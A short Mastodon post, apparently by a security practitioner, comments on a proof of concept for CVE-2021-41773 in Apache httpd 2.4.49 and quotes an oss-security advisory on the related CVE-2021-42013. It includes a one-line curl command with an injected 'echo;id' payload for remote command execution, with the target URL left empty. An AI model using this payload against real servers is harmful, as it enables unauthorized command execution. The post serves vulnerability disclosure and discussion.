Ah, that over there was the CVE-2021-41773 Apache httpd 2.4.49 with mod-cgi PoC a couple of days ago: mobile.twitter.com/hackerfanta

curl --data "A=|echo;id" '' -vv
(Slightly optimized version from down that :birdsite: thread.)

Sure been a long time since I saw one of those 🙄



Subject: [oss-security] CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

Sign in to participate in the conversation
INFRa Mastodon

The social network of the future: No ads, no corporate surveillance, ethical design, and decentralization! Own your data with Mastodon!